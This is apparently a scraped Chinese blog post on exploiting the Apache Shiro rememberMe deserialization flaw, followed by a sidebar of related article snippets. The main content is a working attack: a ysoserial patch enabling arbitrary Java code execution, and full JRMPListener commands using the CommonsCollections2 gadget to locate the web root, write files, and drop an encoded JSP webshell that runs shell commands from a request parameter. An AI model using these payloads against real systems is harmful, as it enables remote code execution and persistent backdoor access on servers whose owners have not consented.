bmcl java_Shiro rememberMe 反序列化漏洞写Webshell

最新推荐文章于 2024-05-22 15:22:21 发布
最新推荐文章于 2024-05-22 15:22:21 发布
阅读量304 收藏
点赞数
文章标签: bmcl java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32797441/article/details/114903108
版权

Shiro rememberMe 反序列化漏洞写Webshell

修改ysoserial使其支持生成java代码执行Payload

原来的代码

String cmd = "java.lang.Runtime.getRuntime().exec(\"" +    command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +    "\");";

修改成如下代码,如果调用ysoserial时候命令参数处有code:就可执行java代码,否则执行命令

String cmd="";if(!command.startsWith("code:")){    cmd = "java.lang.Runtime.getRuntime().exec(\"" +    command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +    "\");";}else{    System.err.println("Java Code Mode:"+command.substring(5));//使用stderr输出,防止影响payload的输出    cmd = command.substring(5);}

然后重新使用mvn编译ysoserial

获取网站路径

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"

向web目录写文件

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/pw.txt\";java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(p);osw.close();"

写webshell

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"

写cmd马

java -cp ys.jar ysoserial.exploit.JRMPListener 65005 CommonsCollections2 "code:String p = Thread.currentThread().getContextClassLoader().getResource(\"../../\").getPath();String shellpath =p+\"/64.jsp\";String shellcontent = \"JTNDJTI1QCUyMHBhZ2UlMjBwYWdlRW5jb2RpbmclM0QlMjJ1dGYtOCUyMiUyNSUzRSUwQSUzQyUyNUAlMjBwYWdlJTIwaW1wb3J0JTNEJTIyamF2YS51dGlsLlNjYW5uZXIlMjIlMjAlMjUlM0UlMEElM0NIVE1MJTNFJTBBJTNDdGl0bGUlM0VKdXN0JTIwRm9yJTIwRnVuJTNDL3RpdGxlJTNFJTBBJTNDQk9EWSUzRSUwQSUzQ0gzJTNFQnVpbGQlMjBCeSUyMExhbmRHcmV5JTNDL0gzJTNFJTBBJTNDRk9STSUyME1FVEhPRCUzRCUyMlBPU1QlMjIlMjBOQU1FJTNEJTIyZm9ybSUyMiUyMEFDVElPTiUzRCUyMiUyMyUyMiUzRSUwQSUyMCUyMCUyMCUyMCUzQ0lOUFVUJTIwVFlQRSUzRCUyMnRleHQlMjIlMjBOQU1FJTNEJTIycSUyMiUzRSUwQSUyMCUyMCUyMCUyMCUzQ0lOUFVUJTIwVFlQRSUzRCUyMnN1Ym1pdCUyMiUyMFZBTFVFJTNEJTIyRmx5JTIyJTNFJTBBJTNDL0ZPUk0lM0UlMEElMEElM0MlMjUlMEElMjAlMjAlMjAlMjBTdHJpbmclMjBvcCUzRCUyMkdvdCUyME5vdGhpbmclMjIlM0IlMEElMjAlMjAlMjAlMjBTdHJpbmclMjBxdWVyeSUyMCUzRCUyMHJlcXVlc3QuZ2V0UGFyYW1ldGVyJTI4JTIycSUyMiUyOSUzQiUwQSUyMCUyMCUyMCUyMFN0cmluZyUyMGZpbGVTZXBhcmF0b3IlMjAlM0QlMjBTdHJpbmcudmFsdWVPZiUyOGphdmEuaW8uRmlsZS5zZXBhcmF0b3JDaGFyJTI5JTNCJTBBJTIwJTIwJTIwJTIwQm9vbGVhbiUyMGlzV2luJTNCJTBBJTIwJTIwJTIwJTIwaWYlMjhmaWxlU2VwYXJhdG9yLmVxdWFscyUyOCUyMiU1QyU1QyUyMiUyOSUyOSU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGlzV2luJTIwJTNEJTIwdHJ1ZSUzQiUwQSUyMCUyMCUyMCUyMCU3RGVsc2UlN0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBpc1dpbiUyMCUzRCUyMGZhbHNlJTNCJTBBJTIwJTIwJTIwJTIwJTdEJTBBJTBBJTIwJTIwJTIwJTIwaWYlMjAlMjhxdWVyeSUyMCUyMSUzRCUyMG51bGwlMjklMjAlN0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQcm9jZXNzQnVpbGRlciUyMHBiJTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwaWYlMjhpc1dpbiUyOSUyMCU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHBiJTIwJTNEJTIwbmV3JTIwUHJvY2Vzc0J1aWxkZXIlMjhuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCOTklMkMlMjAxMDklMkMlMjAxMDAlN0QlMjklMkMlMjBuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCNDclMkMlMjA2NyU3RCUyOSUyQyUyMHF1ZXJ5JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdEZWxzZSU3QiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHBiJTIwJTNEJTIwbmV3JTIwUHJvY2Vzc0J1aWxkZXIlMjhuZXclMjBTdHJpbmclMjhuZXclMjBieXRlJTVCJTVEJTdCNDclMkMlMjA5OCUyQyUyMDEwNSUyQyUyMDExMCUyQyUyMDQ3JTJDJTIwOTglMkMlMjA5NyUyQyUyMDExNSUyQyUyMDEwNCU3RCUyOSUyQyUyMG5ldyUyMFN0cmluZyUyOG5ldyUyMGJ5dGUlNUIlNUQlN0I0NSUyQyUyMDk5JTdEJTI5JTJDJTIwcXVlcnklMjklM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlN0QlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBQcm9jZXNzJTIwcHJvY2VzcyUyMCUzRCUyMHBiLnN0YXJ0JTI4JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwU2Nhbm5lciUyMHNjJTIwJTNEJTIwbmV3JTIwU2Nhbm5lciUyOHByb2Nlc3MuZ2V0SW5wdXRTdHJlYW0lMjglMjklMjkudXNlRGVsaW1pdGVyJTI4JTIyJTVDJTVDQSUyMiUyOSUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMG9wJTIwJTNEJTIwc2MuaGFzTmV4dCUyOCUyOSUyMCUzRiUyMHNjLm5leHQlMjglMjklMjAlM0ElMjBvcCUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHNjLmNsb3NlJTI4JTI5JTNCJTBBJTIwJTIwJTIwJTIwJTdEJTBBJTI1JTNFJTBBJTBBJTNDUFJFJTNFJTBBJTIwJTIwJTIwJTIwJTNDJTI1JTNEJTIwb3AlMjAlMjUlM0UlM0UlMEElM0MvUFJFJTNFJTBBJTNDL0JPRFklM0UlMEElM0MvSFRNTCUzRQ==\";org.apache.commons.codec.binary.Base64 base64 = new org.apache.commons.codec.binary.Base64();String b64shell = new String(base64.decodeBase64(shellcontent.getBytes()));String tmp = java.net.URLDecoder.decode(b64shell, \"UTF-8\");java.io.FileOutputStream fos = new java.io.FileOutputStream(shellpath);java.io.OutputStreamWriter osw = new java.io.OutputStreamWriter(fos);osw.write(tmp);osw.close();"

DeepWeaver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shiro defaultkey无利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 3009
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
Shiro反序列化的检测与利用
Fuzz
02-25 4004
1. 前言 Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。 2. 环境搭建 环境搭建vulhub 3. 如何发现 第一种情况 返回包中包含rememberMe=deleteMe这个字段 第二种情况 直接发送原数据包,返回的数据中不存在关键字 可以通过在发送数据包的cookie中增加字段: rememberMe=deleteMe 然后查看返回数据包中是否存在关键字。 4. 自动检测Shiro反序列化之burp插件 https://g
记一次Shiro实战(目标不出网)
一直在水些技术小文
04-29 1384
1. 在一次渗透测试项目中,检测出了目标系统存在shiro漏洞也可以进行远程命令执行,但是反弹不了shell,原因可能是目标服务器不出网。所以我们得通过shiro漏洞进行webshell漏洞所在位置如下。工具还是使用Shiro550/721漏洞检测工具进行webshell,那有几个问题 工具下载地址:https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51 1.在工具的哪个地方上传木马 2.如何找上传的路径 3
shiro反序列化漏洞原理
最新发布
m0_73649671的博客
05-22 307
shiro反序列化漏洞原理
shiro漏洞复现
黑白的博客
09-05 4310
声明 这个的目的,也是为了学习,分享,交流,希望能被大家看到,我们可以互相学习,希望大家以学习为目的进行漏洞复现,如果有评论的话,我也会认真的看,指出我的不足,我也会认真的改正,嘿嘿,毕竟这条路需要一直学习新的知识,话不多说 漏洞描述 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过
Shiro
gh_xiaohe的博客
11-13 458
😹 作者: gh-xiaohe 😻 gh-xiaohe的博客 😽 觉得博主文章的不错的话,希望大家三连(✌关注,✌点赞,✌评论),多多支持一下!!!
BMCL:Bangbang93的Minecraft启动器
02-04
BMCL,全称为Bangbang93的Minecraft启动器,是一款专为Minecraft游戏设计的第三方启动工具。这款启动器的最新版本为BMCLV3,它在原有的V2基础上进行了大量的改进和优化,旨在为玩家提供更加稳定、便捷的游戏启动体验...
bmclng.exe
02-12
我的世界启动器
template.rar
05-04
Tetrahedron是Elsevier旗下一本专注于无机化学和相关领域的国际期刊,而BMCL(Biomacromolecules Letters)则侧重于生物大分子的研究。这两个模板可能包含特定期刊的特殊要求,如页眉页脚的格式、图表的制作规范、...
SquareMinecraftLauncherCore
05-09
BaiBao请注意该项目遵循MIT开源协议第三方API和库BaiBaoAPI此API因资金不足先暂停使用BMCLAPIbangbang93's minecraft launcher api关于BMCLAPI是@bangbang93开发的BMCL的一部分,用于解决国内线路对Forge和Minecraft...
vulhub——shiro反序列化getshell漏洞复现
W小哥
11-24 5882
一、漏洞概述 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 二、环境搭建 三、漏洞复现 访问目标网站,使用admin:vulhub进行登录 输入用户名、密码进行登录,开启burpsu
记录一次shiro反序列化getshell
daxi0ng的博客
08-02 6980
一个站 http://wxbase.xxxxx.com/error/unauth 一个包,发现有shiro反序列化漏洞 使用ysoserial URLDNS模块探测 java -jar ysoserial.jar URLDNS "http://`whoami`.xxxx.ceye.io">payload.dat python2 shiro-encode.py # -*...
渗透系列之shiro反序列化漏洞检测及案例操作流程
Websec
09-15 6987
参考开源工具即可: https://github.com/feihong-cs/ShiroExploit 原文如下: ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 第一步:按要求输入要检测的目标URL和选择漏洞类型 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/
shiro漏洞工具简单配置
m0_59757868的博客
07-12 3052
工具地址:https://github.com/feihong-cs/ShiroExploit使用环境:java8运行命令:java -jar ShiroExploit.jar当然工具中默认配置的有对应的域名和token值,如果当访问的人过多时,难免会有一些问题导致检测不准确,这里可以自己手动配置自己对应的域名和token值。打开config目录下的config/config.properties文件,内容为 rememberMeCookieName=rememberMe ceyeDomain=xxxxx
反序列化漏洞底层扩展与制作WebShell
2201_75857562的博客
01-14 142
通过学习XMLDecoder的底层执行的流程去发现其他表达式执行,而其中的很多底层都是通过java反射技术实现的!
关于Shiro反序列化漏洞的延伸—升级shiro也能被shell
jiangbb8686的博客
08-30 8142
首先感谢白帽子木板凳,本篇文章是对他提交的一个poc引发的思考。 0x00 概述 第一次接触shiro反序列化漏洞还是16年8月份,距离现在已经很久了,那时候只知道拿着个POC到处打,原理大致看过一下,也没太在意。 但是这次遇到一个问题——某些应用“将shiro升级到1.2.4之后的版本,还存在反序列化漏洞” 0x01 事件过程: 开始: 收到到一个漏洞和一段POC,发现是shiro反...
无回显命令执行PoC编指南(Apache Shiro Java反序列化)
热门推荐
乐枕的家
08-04 1万+
无回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
[Vulhub] Apache Shiro 反序列化漏洞shiro-550,shiro-721)
weixin_45605352的博客
05-15 2427
0x00 漏洞描述 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 0x01 影响版本 Apache Shiro <= 1.2.4 漏洞特征: shiro反序列
记录WebLogic(CVE-2017-10271)反序列化漏洞WEBSHELL地址
IT界迷者Blog--
10-17 3925
记录WebLogic(CVE-2017-10271)反序列化漏洞WEBSHELL地址 首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001 说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接… 接着想着是否存在昨年的weblogic,试了下,果然存在。 接下来shell,访问发现,如下图。 此时我的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值